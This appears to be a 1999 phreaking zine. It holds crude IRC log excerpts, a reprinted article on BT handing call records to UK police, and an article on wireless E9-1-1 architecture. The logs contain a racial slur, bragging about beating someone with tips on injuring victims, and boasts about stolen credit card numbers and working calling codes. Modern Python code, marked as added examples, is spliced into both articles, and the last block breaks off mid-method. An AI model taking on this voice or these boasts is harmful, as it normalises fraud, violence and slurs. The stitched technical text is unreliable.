SPOT THE WORD _FUCK_ IN #darkcyde } we all need to learn some manners..
<oclet> tonekilla is a fuckin moron
<hybrid-> fucker
<hybrid-> i fucking keep my homewerk on there
<digiphrq> thats fucking lame... packet kiddies are coming at me for no real
reason tonight
<DTMFslut> force is a fuckin p4k13
<Kryptus> woops fucking script let me fix this
*xio* which fucking sucks, heh.
<simmeth> fuckin' shit
<holyblob> fuck
<[JaSuN]> fucking thing
<force> fuck sake
<prez_> my sounddev is fucked right now.. doesn't work .
<[JaSuN]> gimme fuckin greetz#
<prez_> i need a fucking linerec in.
<[JaSuN]> fuckin text flood y0
<[JaSuN]> fuck the song
<simmeth> err fuck
<prez_> god fucking damnit.
<prez_> i'm fucking pissed
<ch1ckie> fucking idiot
<ch1ckie> THE FUCKING MUD
* hybrid- wonders what the fuck is going on
* hybr1d is away: (fucks sake) [BX-MsgLog On]
<oclet> stupid fuckin bot
*oclet* you fucked up too?
<[JaSuN]> to much time in front onf fuckin pc's
<hybrid-> fuck
<z0mba> fuckin playing football
<hybrid-> i want a fucking nurse to
<z0mba> no, so fuck off l4m3r
<z0mba> fuckin fast car
<hybrid-> yo werd up k4t fuX0r1ng, h4mpstuH li#1ck1ng, d0g a$$ sn1ffing,
g3rb1l r4pp1nG, m0nk3y fucK1nG, m0th3rfuck3rZ?
<downtime-> I hate that fucking Fatality
<downtime-> what the fuck hybrid?
<nino> heh What the fuck is up jason.
<tonekilla> well FUCK YOU
<tonekilla> FUCK YOU
<ch1ckie> NO FUCK YOU
<tonekilla> fuck
<nino> who fucken cares tk
<tonekilla> i dont give a fuck
<jason_> tk: don't fuck with nino bitch
<nino> ill tell u to relax if i fucken feel like it
<ch1ckie> FUCK YOU
<tonekilla> NINO IS MY FUCKING BRO
<tonekilla> IM NOT FUCKING WITH HIM
<tonekilla> fuck, ch1ckie has her pms and everyone jumps on my back
<downtime-> what the fuck is going on now?
<downtime-> another fucking fight?
<tonekilla> ch1ckie started it.... and no one fucking gives a shit
<nino> damn.. i would fuck mary jane in a heart beet
<tonekilla> you dont fuckng ban someone with everything that happens
<tonekilla> motherfuckers stop
<downtime-> WHAT THE FUCK IS WRONG WITH YOU PEOPLE?!
<oclet> if you dont agree with me, fuck off ;P
<nino> dude i am just fucken with ya
<jason_> And I ain't really never gave a fuck how niggaz feel
* hybrid_ is wondering what the fuck is going on with these ppl
<hybrid_> EVERYONE SHUT THE FUCK UP
<hybrid_> fuck you
<tonekilla> you didnt get banned for no fucking reason from a channel you
properly ran for 3 months then someone comes in, kicks and bans you and
fucking turns it into a dynasty
*downtime-* what the fuck is going on?!
<hybrid_> tone shut the fuck up
<z0mba> for fucks sake, its only irc
<tonekilla> FUCK YOU
<nino> WHAT THE FUCK OClet
<jason_> fuck the big yellow
<prez_> this flaw is so fucking simple.
<DTMFslut> fuck
<hybr1d> it's all fucked
<prez_> irc = fucked, all day, everyday:)
<sonicborg> fucking good stuff.
<simmeth> fuck
<gossi> got fuck loads of cc cards
<simmeth> get speech pro u lazy fuck
<gossi> all these fucking kodes still work
<gossi> fucked off
<gossi> fucking poor NT admins
<gossi> FUCKING HUGE BILL~!~#
<DgtlFokus> mother fucker
more cf1sh logz } this kid called me weird, i dunno why!@" - hybrid
---------------
Session Start: Sun May 16 15:21:22 1999
<z0mba> sup?
[15:21] <cfish> ok well not really
[15:21] <cfish> did you put up the thing on barby.org
<z0mba> nope
<z0mba> jasun did
[15:22] <cfish> why
<z0mba> cos ur lame i guess
[15:22] <cfish> why you reckon that
<z0mba> i thought we were talking about why jase put it up
<z0mba> not what i thought
[15:24] <cfish> ok fine but personnaly what do you think
<z0mba> pretty much the same thing
<z0mba> you haven't done anything to prove yourself otherwise
[15:25] <cfish> lame or just nothing
<z0mba> lame
[15:26] <cfish> but why i dont get it
<z0mba> your ereet man, read faith 5
<z0mba> when its out
[15:27] <cfish> when its out i will but why you reckon im lame?
<z0mba> just do
[15:28] <cfish> there must be a reason
[15:28] <cfish> i barely know you
<z0mba> aww, poor little diddums
<z0mba> dood?
<z0mba> why u cry about it?
[15:33] <cfish> yes
<z0mba> prove me wrong
[15:33] <cfish> just a bit annoyed
[15:33] <cfish> you cant trust anyone
<z0mba> i know
[15:34] <cfish> what you want me to do give you 3 outdials a world calling
card ~voice mail boxes etc?
[15:34] <cfish> lol
<z0mba> lamer
<z0mba> outdials and vms's are lame
<z0mba> my mum could get them
[15:34] <cfish> i know vms's are lame
<z0mba> show me u r eleet
[15:35] <cfish> you call a way of grabbing calling cards from 2 meters away
from a payphone and having it displayed on a lcd display lame?
<z0mba> yup
[15:36] <cfish> im glad your so eleet
<z0mba> why thankyou, so am I
<z0mba> come on man, prove me wrong
[15:36] <cfish> so could you do that with the calling cards?
<z0mba> prove you can grab calling cards from 2 meters away and have it
displayed on an LCD
<z0mba> and i won't think u are so lame
[15:37] <cfish> good i will
<z0mba> and then prove yourself properly
[15:37] <cfish> you know hearing aids
[15:37] <cfish> set to mode T
[15:37] <cfish> they can pick up phone conversations
<z0mba> lame
<z0mba> everyone knows that
[15:38] <cfish> i know
<z0mba> that is in loads of old skool texts
[15:38] <cfish> but if you make a circuit...
<z0mba> tell me something thats *not* lame
[15:38] <cfish> that reckognises when you press 144
[15:38] <cfish> and then decodes the rest until you press stop
[15:38] <cfish> and displays it on a LCD
[15:38] <cfish> is that lame
<z0mba> give me circuit schematics then
<z0mba> cos that don't prove nothing
<z0mba> i could say "make a circuit that decodes secret MI5 government
transmission", but that wouldn't make me eleet would it
<z0mba> *prove*
<z0mba> remember that word?
[15:41] <cfish> true but im working on it
<z0mba> so you haven't actually done it yet?
[15:41] <cfish> no
[15:41] <cfish> but in theory it will work
<z0mba> l4m3r
[15:42] <cfish> but now im not going to publicise it
<z0mba> lots of things werk in theory
[15:42] <cfish> true and lots in practise as well
<z0mba> shame u r so lame really isn't it
<z0mba> so basically, all u want is phr33 calls
<z0mba> lame
<z0mba> lame
<z0mba> lame
[15:42] <cfish> ask the person who helped you make uphreak.8m.com if im lame
*** <=- °SD v8.5 PrO° -=> (cfish) Is Not On IRC Right Now !
*** <=- °SD v8.5 PrO° -=> (cfish) Is Not On IRC Right Now !
Session Close: Sun May 16 15:43:21 1999
downt1me } this dude is EV1l, evil i tell ya..
-------------
<downtime-> I kicked the kid's ass
<downtime-> I got my foot, and placed it on his forehead ;)
<downtime-> then i got my fist and beat his face to shit.
<hybr1d> LOL
<hybr1d> you're an animal
<hybr1d> lol
<downtime-> it was fun..
<downtime-> indeed..
<hybr1d> :>
<downtime-> no one fucks with me.. ;)
<hybr1d> same here
<downtime-> cuz i wil grab a chair and hit them with it
<downtime-> or a pencil or anything!
<hybr1d> LOL!
<downtime-> the best thing to do is always if ya dont have a clear shot to
the head, go for the knees. ;)
<downtime-> take them down..
<downtime-> then kick the shit outta them
<downtime-> then get a pipe and break it over their backs
<hybr1d> LOL
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[::[ BT conspiracy ]::::::::[OO--[ postal phreak ]---------------------
-->]OO[::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
ANYONE READING this may already have had details of who they telephone or are
phoned by fed into police computer files, it emerged last week after details
of automatic links between BT and police computers were described in public
for the first time. Delegates to an international conference on economic
crime in Cambridge were told that the number of requests for BT data from the
police and other agencies was doubling every year, and could involve
thousands of people in the course of just one investigation.
Not just phone calls are now logged into police computers, it was revealed.
All vehicles entering or leaving the City of London or British seaports are
being watched by robot automatic number plate scanners (ANPS), which feed the
data to the Police National Computer (PNC) in Hendon. The PNC replies within
five seconds if the vehicles are of interest to police. Daryl Godivala, head
of BT's Network Special Investigations Department, explained to the conference
that BT has met ever-increasing police demands for details of customers' calls
by installing an automated computer-to-computer interface to feed call
information out. Unlike telephone tapping, warrants are not required before
confidential data is sent out by BT.
All British telecommunications operators, including mobile phone airtime
suppliers, are storing and handing over this information, although only BT
runs an automated system. BT says this has been done to minimise cost in the
face of escalating and hitherto uncoordinated police requests. Other UK
telecommunications companies and mobile phone operators normally supply data
only on paper.
Currently, BT receives and processes about 1,000 requests a week, Godivala
indicated. Most requests were for details of subscribers' names and addresses,
he said, rather than the numbers they had called. But the traffic in personal
call information is already so large that two British firms have produced
special software to automatically process BT telephone call data for
intelligence purposes. These systems - called iTel and CaseCall - are
currently used by every British police force, as well as by Customs, MI5 and
the National Criminal Intelligence Service. Once received, the data is sifted
and transformed into pictorial networks and charts of who talks to whom. To
these are added bank records, housing information, vehicle details, and
information from inquiries, newspapers, the Net and informants. The resulting
charts are often so comprehensive and complex as to back up the most robust
of paranoid nightmares. But is it only the guilty who have cause to be
worried about the new intelligence systems?
According to intelligence analysts who have designed and used telephone call
analysis systems, a single investigation - particularly drugs cases - can
eventually result in requests for information about calls made by hundreds or
even thousands of telephone customers. Names and addresses of customers
called by a suspect are traced and fresh requests sent in to get their calls.
The result is an ever-widening circle of people who have been called by
people who have been called (and so on) by the original suspect.
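As an added illustration (not part of the article), the Python below models the chaining described above on constructed call records: each hop requests the records of everyone who spoke to the previous hop, and the running count shows how quickly uninvolved subscribers (the shared dentist's other patients, a wrong number) are swept in. Every number and record is invented.

```python
"""Added illustration (not from the article): how an investigation that
chains call-record requests sweeps in an ever-widening circle of
subscribers. All numbers and records below are constructed sample data."""

from collections import deque

# Constructed call-detail records: (caller, called). Every number is made up.
SAMPLE_CDRS = [
    ("01223 100001", "01223 100002"),  # suspect -> associate
    ("01223 100001", "01223 100003"),  # suspect -> dentist (shared by many)
    ("01223 100004", "01223 100001"),  # wrong number dialled into the suspect
    ("01223 100002", "01223 100005"),  # associate -> friend
    ("01223 100003", "01223 100006"),  # dentist -> other patients
    ("01223 100003", "01223 100007"),
    ("01223 100003", "01223 100008"),
    ("01223 100005", "01223 100009"),
    ("01223 100009", "01223 100010"),
]


def contact_graph(cdrs):
    """Undirected who-talks-to-whom graph: a request for one number's
    records returns both the calls it made and the calls it received."""
    graph = {}
    for a, b in cdrs:
        graph.setdefault(a, set()).add(b)
        graph.setdefault(b, set()).add(a)
    return graph


def expand(cdrs, suspect, max_hops):
    """Breadth-first expansion as the article describes: each hop traces the
    numbers that spoke to the previous hop and requests their records too.
    Returns {hop: set of numbers whose records were requested at that hop};
    hop 0 is the original suspect."""
    graph = contact_graph(cdrs)
    seen = {suspect}
    frontier = deque([(suspect, 0)])
    by_hop = {0: {suspect}}
    while frontier:
        number, hop = frontier.popleft()
        if hop == max_hops:
            continue  # do not request records beyond the chosen depth
        for contact in graph.get(number, ()):
            if contact not in seen:
                seen.add(contact)
                by_hop.setdefault(hop + 1, set()).add(contact)
                frontier.append((contact, hop + 1))
    return by_hop


def swept_in(cdrs, suspect, max_hops):
    """Number of subscribers other than the suspect whose records get pulled
    when the investigation chains requests out to max_hops."""
    return sum(len(s) for hop, s in expand(cdrs, suspect, max_hops).items()
               if hop > 0)


if __name__ == "__main__":
    for hops in range(4):
        print(f"{hops} hop(s): {swept_in(SAMPLE_CDRS, '01223 100001', hops)} "
              "subscribers' records requested")
```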
One Cambridge detective present claimed that this method had worked well for
his force after he had downloaded information on thousands of calls and used
it to help break a computer theft ring. Cambridgeshire police crime analyst
Cliff Nicklin said £500,000 of stolen equipment had been recovered.
In theory, all requests for BT information such as the name and address of a
particular subscriber, or the numbers they have called over the previous
three years, have to be approved by a senior police officer, of the rank of
assistant chief constable or above. In practice, the senior officer's approval
is delegated to more junior officers operating the link computer, and is
forwarded automatically from their computers to BT - whose computer centre
authenticates the request, and then downloads the information required.
Foreign police and security specialists expressed surprise at the scale and
growth of the British telephone surveillance system. In the US, Canada and
most European states, a judicial warrant (at least) is necessary to have
access to telephone call records. An official from the Canadian Security
Intelligence Service said he was astonished that such privacy-sensitive
information was so freely handed over. A French investigating magistrate said
that in France the police would not be permitted to have such information
without judicial approval.
Inevitably, many of those whose telephone numbers are caught in the ever-
enlarging web of a criminal investigation will be innocent of any involvement
other than sharing the same dentist, doctor, school or uninvolved
acquaintances. They could even have been a victim of the suspect - or just a
wrong number. Unlike the guilty, however, the innocent have no right to know
that their personal telephone call information has been downloaded by BT into
police, customs or security service computers. The Data Protection Act
requires both the police and BT to keep full records of disclosures. But the
subject whose privacy has been breached is not entitled to find out that
disclosure has taken place, even long after an investigation has been
concluded.
The BT-police interface was one of a range of novel police resources
explained to delegates concerned with fighting international fraud and
economic crimes, especially on the Net. They were also told about the latest
developments at Britain's PNC which, according to PNC director John Ladley,
are leading to much better support for intelligence-led policing. Many new
systems had been introduced in the mid-1990s, and more were scheduled. Among
these were Quest, which can search the 5.5 million names in the Criminal
Names index by reference to factors including accent, associates, habits,
places and addresses, and even shoe sizes. The recently enlarged names index
also includes information about DNA samples and photographs, and is linked to
a 4.25 million name fingerprint index. Quest was expected to be fully
operational early in 1998.
For vehicles, the PNC is offering Vods - a vehicle owner's descriptive search
- which can answer questions such as: who owns a blue Volvo and lives in this
postcode district? Searches like that have previously been too time-consuming
to be used in most cases. Ladley also expects the use of automatic number
plate scanners to rise dramatically as more and more police chiefs decide
they want them. Currently, scanners send in up to 80,000 checks a day. The
PNC anticipates that this use will soon quadruple. All such inquiries are
stored for data protection and auditing purposes. This means that historical
records from the ANPS system could also be mined, for example to analyse
patterns of foreign travel. The little-noticed and still progressing
revolution in police information technology has resulted in the employment of
growing numbers of police intelligence analysts who use powerful computer
systems to visualise and analyse the meaning of the massive and growing data
inputs from cameras, telephones and bank records as well as traditional
police sources. Neither these jobs nor the computers to back them up existed
in the 1980s.
Britain's market leaders in intelligence systems are two Cambridge-based IT
companies, who showed off their latest wares last week. One of them, i2,
claims its Analyst's Notebook is used by all British police forces. The
Notebook was used to produce charts for such high profile cases as the
Frederick and Rosemary West murder case and for City fraud investigations.
i2's Web site (http://www.i2ltd.demon.co.uk) offers an animated demonstration
of how investigative charts are assembled from myriad data inputs. The
company describes its network analysis sub-system as particularly useful for
Internet traffic, as well as for telephone transactions and [bank] account
transfers. The Harlequin group (http://www.harlequin.com) says that its
system, Watson, is used around the world to investigate fraud, drug
trafficking and organised crime. It too produces large and elaborate charts.
Watson is designed to draw information directly from the standard Home Office
large major inquiry system - Holmes for short. Watson uses artificial
intelligence techniques to automatically distinguish relationships between
people, places and objects from the data that is fed in. For the potentially
guilty but not the innocent, recent legal changes mean that defendants can
level the playing field by asking the police to hand over their databases.
The 1996 Criminal Procedures and Investigations Act requires the police to
record inquiries from beginning to end, and to reveal all their material -
used or unused - to the Crown Prosecution Service. If information given to
the CPS suggests that the defendant might be innocent, or casts doubt on
the reliability of prosecution witnesses, the defence has to be told.
Judges have already made at least two orders for the police to copy Holmes
databases for the defence to analyse. On the first occasion, however, defence
lawyers had no idea how to read the data they were sent. In the second case,
which is still sub judice, specialists have been retained to advise on how to
interpret and analyse the police data. Both sides of the courtroom are thus
having to come to terms with the new era of electronic transparency. But, as
the law stands, the innocent and uninvolved still have no right to know - let
alone protest - that their data too has been mined and warehoused for future
use.
These latest findings add more threat to us, the phreaking community.
-PostalPhreak
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[::[ Wireless E-9-1-1 ]::::::::[OO--[ by digiphreq ]-------------------
-->]OO[::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
Wireless Enhanced 9-1-1 Service- Architecture and future.
By Digiphreq <digiphreq@webcrunchers.com>
Darkcyde Communications 5/8/99
darkcyde.8m.com
"A nerd is somebody who's life is focused on computers
and technology. A geek is somebody who's life is focused
on computers and technology and likes it that way."
Ye Ol' Table of Contents
I. Introduction
II. A Bit of History
III. FCC Regulations on Wireless 9-1-1
IV. Common Wireline 9-1-1 Service
V. Issues on How to Make Wireless 9-1-1 Work
1. Stage 1
2. Stage 2
VI. Long Term & Conclusion
I. Introduction:
As you probably very well know, Enhanced 9-1-1 (E9-1-1) is the most common
form of 9-1-1 these days. It is still possible to find B9-1-1 if you live in
the middle of nowhere. Anyway, today wireline E9-1-1 relays all the important
info on you (location, name and telephone number) to the dispatch
telecommunicator, which then accurately routes your call to the proper
Emergency Dispatch Station. In theory this makes the whole process faster, so
as to get you help quicker, which is often not the case. With the current
workings of wireless networks, E9-1-1 isn't really possible, though carriers
have begun to incorporate technologies to support it. This is all because of
a bunch of new regulations which the FCC placed on wireless communications,
which called for an improvement in the use of E9-1-1. Originally, in 1996,
they created a two-stage timeline, which I will be explaining later. A quick
overview: Stage one will require wireless networks to provide the user's
call-back number and the location, including which cell sector they are in.
Stage two allows for a more precise pinpointing of the caller's location,
which requires a bit more hardware and technology. I will touch on a brief
history of wireline E9-1-1 service, wireless E9-1-1 service operations (how
it should work), and a more detailed overview of the two-stage process
involved in upgrading the current wireless system.
II. A bit of History:
The first 9-1-1 service was introduced in Alabama in 1968. It's also known
as Basic 9-1-1 or B9-1-1. This was a very primitive version of E9-1-1 which
only routed your call to a local police station. In the 1980s B9-1-1 was
enhanced and E9-1-1 was introduced.
Database Automatic
_ Management Location
/ \ System Info |
/ \ | |
_____ | |
: : Emergency |
: : Service |
:_____: Adjunct |
| | |
| | |
| | |
| 5ESS switch |
Central E9-1-1 |
Office _________selective_____________PSAP
router \
(routes Ani) \___ Displays:
Location
Call back #
Mapping Location
As you can see (sort of), when a residential or commercial line dials 911,
the call goes to the central office switch, which routes it to an E9-1-1
selective router. That router then routes the call to the correct PSAP based
on the user's telephone number. The phone number is passed from the PSAP to
the Customer Premises Equipment (CPE), which uses it to look up the user's
name and address in an Automatic Location Information (ALI) database. On top
of all this, the user's line number is then used as the call-back number in
case the caller accidentally hangs up (e.g. the killer hangs up the phone for
them...) or the PSAP dispatcher needs to call the user back.
III. FCC Regulations on Wireless 9-1-1
(This Was Borrowed)
Points of Interest in the FCC Ruling Over Wireless 9-1-1
-Wireless carriers must support call routing based on cell sector,
and they must also convey information sufficient to enable the PSAP to call
back the 9-1-1 caller (that is, transmit the calling party number) within 18
months of the ruling's effective date. This requirement is sometimes called
Stage 1.
-Carriers must support deployment of technology to determine a caller's
location within 125m of accuracy for 67% of all wireless 9-1-1 calls
within five years of the effective date. Support of a specific location
determination, which will require PSAPs to be able to handle coordinates
rather than street addresses, is sometimes called Stage 2.
-The FCC will entertain waivers on a case by case basis for not complying
with the rules.
-Any call from a handset having a MIN must be transmitted to 9-1-1 even if
the handset no longer has valid service. The call may not be intercepted
or blocked. The local PSAP may decide whether or not to receive calls from
non-MIN telephones, for example phones that were never service activated.
if a PSAP requests these calls, the carrier is supposed to provide them.
-The ruling applies to cellular, broadband PCS, and geographic area SMR
providers (meaing SMRs that provide mass market services). Systems
provided
by movile satellite communications vendors, such as Motorola's Iridium, are
not covered by this ruling.Because it is not a federal issue, the FCC has
determined that localities and states should plan for cost recovery at
their levels. Details of subsidization for deployment and nonsubscriber
calls must be negotiated on local level (State or municipality, similar
landline 9-1-1 subsidization). Funding should be available for both basic
and enhanced 9-1-1.
Conditions for Compliance:
1. PSAPs must request and be ready to handle wireless location information.
2. A cost recovery mechanism (negotiated at the local level) must be in place.
PSAP Choices:
Because of the two conditions for compliance PSAPs effectively choose
implementation dates.
PSAPs also get to choose whether they want to handle calls from handsets
without MINs.
Further Rulings for the Future:
- Tightening of location accuracy requirements to 40 feet 90% of the time,
- Availability of altitude information,
- Performance criteria on time for calling completion,
- Consumer Education programs for wireless 9-1-1,
- Possible reconsideration of issues of PSAP choice, and
- Possible requirement that the strongest signal must carry the 9-1-1 call.
IV. Common Wireless 9-1-1 Service
Today in most areas wireless networks have the ability to run off of B9-1-1,
thanks to the AUTOPLEX System 1000. Basically a caller can dial 9-1-1 and be
connected to the proper PSAP based on the location of the serving cell.
Location routing is done digit by digit: the Automatic Number Identification
(ANI) field of the Centralized Automatic Message Accounting (CAMA) signaling
is populated with a number that corresponds to the serving cell rather than
with a subscriber's number. On arrival at the E9-1-1 selective router that
field identifies the PSAP for the area, and the call is routed there. The
alternative is to populate the ANI field with a 7-digit dial-back number
instead of the location information. The E9-1-1 selective router then assigns
the incoming trunk one of four NPAs, and the remaining seven digits complete
the 10-digit dial-back number.
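As an added illustration (not code from the original article), the following
Python models the 8-digit CAMA ANI field described in this section: one leading
digit selects one of the four NPAs provisioned on the trunk, then seven
subscriber digits follow. The trunk name, NPAs, phone numbers and the
cell-to-PSAP table are constructed sample values, and encode_ani, decode_ani
and route_on_cell_ani are names invented for the example. It also shows why a
roaming handset whose NPA is not one of the trunk's four cannot have its
dial-back number delivered this way.

```python
"""Model of the 8-digit CAMA ANI used to reach an E9-1-1 selective router.

Added example; trunk, NPAs, numbers and tables are constructed, not real data.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class CamaTrunk:
    """An incoming CAMA trunk at the E9-1-1 selective router.

    The position of an NPA in `npas` is the single digit that precedes the
    seven subscriber digits on the trunk, so one trunk can only express four
    area codes.  Sample NPAs are passed in by the caller.
    """
    name: str
    npas: tuple

    def __post_init__(self):
        if len(self.npas) != 4 or any(len(n) != 3 or not n.isdigit() for n in self.npas):
            raise ValueError("a CAMA trunk is provisioned with exactly four 3-digit NPAs")


def encode_ani(trunk, full_number):
    """Build the 8-digit ANI (NPA digit + 7 subscriber digits) for a 10-digit number.

    Raises ValueError when the caller's NPA is not among the trunk's four: this is
    the roaming case, where a visiting handset's dial-back number simply cannot be
    represented on the trunk.
    """
    digits = "".join(ch for ch in full_number if ch.isdigit())
    if len(digits) != 10:
        raise ValueError("expected a 10-digit NANP number")
    npa, subscriber = digits[:3], digits[3:]
    try:
        npa_digit = trunk.npas.index(npa)
    except ValueError:
        raise ValueError(f"NPA {npa} is not provisioned on trunk {trunk.name}") from None
    return f"{npa_digit}{subscriber}"


def decode_ani(trunk, ani):
    """Rebuild the 10-digit dial-back number from the 8-digit ANI on a trunk."""
    if len(ani) != 8 or not ani.isdigit():
        raise ValueError("CAMA ANI is eight digits")
    npa_digit, subscriber = int(ani[0]), ani[1:]
    if npa_digit > 3:
        raise ValueError("NPA digit must select one of the trunk's four NPAs")
    return trunk.npas[npa_digit] + subscriber


# Location routing, the other way of filling the field: the ANI carries a number
# assigned to the serving cell, and the selective router only needs a table of
# those numbers.  Constructed sample table.
CELL_ANI_TO_PSAP = {
    "07770001": "PSAP-NORTH",
    "07770002": "PSAP-SOUTH",
}


def route_on_cell_ani(ani, table=CELL_ANI_TO_PSAP):
    """Pick the PSAP for a cell-identifying ANI; unknown cells cannot be routed."""
    try:
        return table[ani]
    except KeyError:
        raise ValueError(f"no PSAP provisioned for cell ANI {ani}") from None


if __name__ == "__main__":
    trunk = CamaTrunk("T1", ("312", "708", "773", "847"))
    ani = encode_ani(trunk, "773-555-0199")
    print(ani, "->", decode_ani(trunk, ani))
    print("cell 07770002 ->", route_on_cell_ani("07770002"))
```

The two functions are deliberately the inverse of each other so you can see
that nothing but the trunk's NPA table turns the leading digit back into an
area code; a roamer from a fifth area code has no representation at all.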
V. Issues on How to Make Wireless 9-1-1 Work:
There are several wireless problems which limit the use of E9-1-1. First,
CAMA trunk signaling transmits a single 8-digit number to the PSAP: one NPA
digit plus seven subscriber digits. Because that one digit can only select
among four NPAs, the trunk cannot carry the caller's number while a wireless
subscriber is roaming with a number from some other area code. Second, the
caller's telephone number (the Mobile Directory Number, MDN) cannot be used to
route a wireless E9-1-1 call, because a mobile's location has nothing to do
with its MDN. Since no real street address can be associated with an MDN, the
dispatcher cannot dispatch emergency services from it. So while this could
seem kind of hopeless it's really not. A lot of ways have been devised to
handle this, most of which involve in-band analog MultiFrequency (MF)
signaling. I'll start out with some bad ideas, then explain the good one.

There was the Group D signaling solution. Feature Group D was first intended
for equal access on long distance calls. It is able to carry both a 10-digit
ANI and a 10-digit dialed-digits field, so the dialed-digits field could be
used for the location information. The problem with this method (and you knew
there would be a problem...) is that it cannot support an interface between a
Mobile Switching Center (MSC) and the selective router the way Signaling
System 7 (SS7) does.

Next there was a method which converts Group D signaling to CAMA. This method
is fairly complicated and degrades performance, which makes it a bad choice,
but here goes an explanation. Assume the MSC cannot provide SS7 connectivity
to the PSTN and the 9-1-1 selective router cannot support SS7 or Group D
signaling for 9-1-1 call processing. A Group D to CAMA translation device
between the MSC and the selective router provides the signaling conversion.
The translation device has a third interface which sends the 10-digit
dial-back number and the location information to the ALI database during call
setup, and it sends a special 7-digit key value in the ANI field to the
selective router. This key represents the cell from which the call was
placed, so the router can route on it, and the 7-digit key is then delivered
to the PSAP during call setup. The PSAP queries the ALI with this key value
and gets back the real 10-digit MDN and the location.

Next we have an expanded CAMA signaling solution, which has no practical
reason for existing. It just won't work, but I'll explain it anyway. The
existing CAMA inter-switch 9-1-1 signaling may be built upon to support a
10-digit ANI and a 10-digit location number. This requires modifications to
the current PSAP hardware and to the 9-1-1 selective router, and it degrades
performance because of the extra MF signaling involved.

Finally we have the practical solution, which is what was mainly used for the
Stage 1 process: a solution through SS7, which should make hybrid's day. He
just can't seem to get enough of SS7. The use of SS7 will be explained in my
explanation of what Stage 1 was.
Stage 1:
Basically an entirely new architecture is needed. The common setup was to
distribute the service processing across the AUTOPLEX System 1000 MSC, the
5ESS-2000 switch, the Emergency Services Adjunct (ESA), the ALI database, its
associated database management system, and the PSAP CPE. The MSC uses ISDN-UP
(ISUP) signaling to convey a 10-digit dial-back number in the charge number
parameter, and location information in the called party number. The 9-1-1
selective router uses the location information to route the call to the
appropriate PSAP. An ISDN PSAP is required to receive and use both the
10-digit dial-back number and the location information.

Some major improvements to the AUTOPLEX System 1000 were put into effect for
Stage 1. CAMA signaling is replaced with ISDN-UP, which has the obvious
advantage of being able to transmit both the dial-back number and the location
information, as opposed to the single 8-digit number CAMA carries. CAMA
signaling also only supports a 7-digit calling party number combined with one
of four area codes, whereas ISDN-UP supports the full 10-digit calling party
number. Another major change was in the MSC, which now uses ISDN-UP signaling
as well: it conveys a 10-digit dial-back number in the charge number field and
a 10-digit routable Directory Number (DN) in the called party number field
which represents the cell location and the originating service provider.
Basically this is what makes roaming customers work. The use of a DN allows
the call to be routed through the PSTN to the E9-1-1 selective router grouped
with the PSAP without direct connection trunks. The E9-1-1 selective router
then selects the appropriate PSAP based on the serving cell, call type, and
some other less important criteria. To support this, the dialed-digit routing
capability must be integrated with the 5ESS-2000 switch E9-1-1 feature, thus
allowing these calls to be routed using the called party number rather than
the ANI. Location information, dial-back number, and service provider are
forwarded to the PSAP via ISDN during call setup. An ISDN PSAP is required to
receive and use both the dial-back number and the location information encoded
in the dialed digits.

In the case where the PSAP cannot support ISDN, an enhanced adjunct processor
interface (API) provides the ability to support existing PSAP CPE, which uses
CAMA in-band signaling. The information received via SS7 ISDN-UP from the MSC
at the 5ESS-2000 is forwarded over the API when the ESA is queried for routing
information. The ESA then forwards it to the ALI over a new ESA to ALI
interface, and the 5ESS switch passes a unique 7-digit key value to the PSAP
in the ANI field. When the PSAP queries the ALI with this value, the location,
service provider and dial-back number are returned to the PSAP. Note that the
key in the ANI field is not a dialable number: a CAMA PSAP that never performs
the ALI query has no call-back number at all.

The PSAP equipment needs to be enhanced to show the caller's location to the
telecommunicator, either textually, where the called party number is used to
query the ALI database, which returns the location and identification of the
cell/sector, or with a Geographic Information System (GIS) that shows the
caller's approximate location on a computer-generated map. The PSAP GIS map
displays give the dispatcher a visual fix on the caller's location (their
cell/sector) relative to other important geographical features. The displays
can pinpoint roads, addresses, buildings, houses, EMS dispatch vehicles, fire
hydrants, cell sites, and the boundaries of the emergency service areas. Ok,
so since this was originally put to use back in 96 and was to last for a
period of approximately 18 months, it has for the most part gone into effect
in most areas. It's hard to say though, depending on the area....
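An added toy model (not code from the article or from any vendor) of the
Stage 1 flow for a PSAP that still takes CAMA: the MSC's ISUP message carries
the dial-back number in the charge number parameter and a routable cell DN in
the called party number; the switch routes on the called party number; for a
CAMA PSAP the ESA stages an ALI record under a fresh 7-digit key, and that
key, not a phone number, goes down the trunk in the ANI field. The DNs, the
tables, the message fields and the class names are assumptions made for the
example; it is a Python sketch of the data flow, not an ISUP or ALI protocol
implementation.

```python
"""Stage 1 wireless E9-1-1 call flow toward a CAMA-only PSAP.

Added example with constructed data; not the article's or any vendor's code.
"""
from dataclasses import dataclass, field
from itertools import count


@dataclass
class IsupIam:
    """The two ISUP initial address message fields the article relies on."""
    charge_number: str        # 10-digit dial-back number (the caller's MDN)
    called_party_number: str  # routable DN the MSC assigns per cell/sector


# Routable DNs and the (cell, sector, provider) each one stands for. Constructed.
CELL_DN = {
    "5555550101": ("A1", "north", "CarrierX"),
    "5555550102": ("A1", "south", "CarrierX"),
    "5555550201": ("B7", "omni", "CarrierX"),
}

# Selective router table: which PSAP serves which cell/sector. Constructed.
PSAP_BY_CELL = {
    ("A1", "north"): "PSAP-EAST",
    ("A1", "south"): "PSAP-EAST",
    ("B7", "omni"): "PSAP-WEST",
}


def select_psap(iam):
    """Route on the called party number (the cell DN), never on the ANI."""
    try:
        cell, sector, _provider = CELL_DN[iam.called_party_number]
        return PSAP_BY_CELL[(cell, sector)]
    except KeyError:
        raise ValueError(f"no PSAP route for DN {iam.called_party_number}") from None


@dataclass
class AliDatabase:
    """ALI records keyed by the 7-digit key that rides in the CAMA ANI field."""
    records: dict = field(default_factory=dict)

    def query(self, key):
        try:
            return self.records[key]
        except KeyError:
            raise ValueError(f"ALI has no record for key {key}") from None


class EmergencyServicesAdjunct:
    """Hands out a per-call 7-digit key, stores the real data in the ALI under
    that key, and returns the key for the switch to send as the ANI."""

    def __init__(self, ali):
        self.ali = ali
        self._next = count(1)

    def stage_call(self, iam):
        cell, sector, provider = CELL_DN[iam.called_party_number]
        key = f"{next(self._next) % 10_000_000:07d}"
        if key in self.ali.records:
            raise RuntimeError("7-digit key space exhausted; release finished calls")
        self.ali.records[key] = {
            "dial_back": iam.charge_number,
            "cell": cell,
            "sector": sector,
            "provider": provider,
        }
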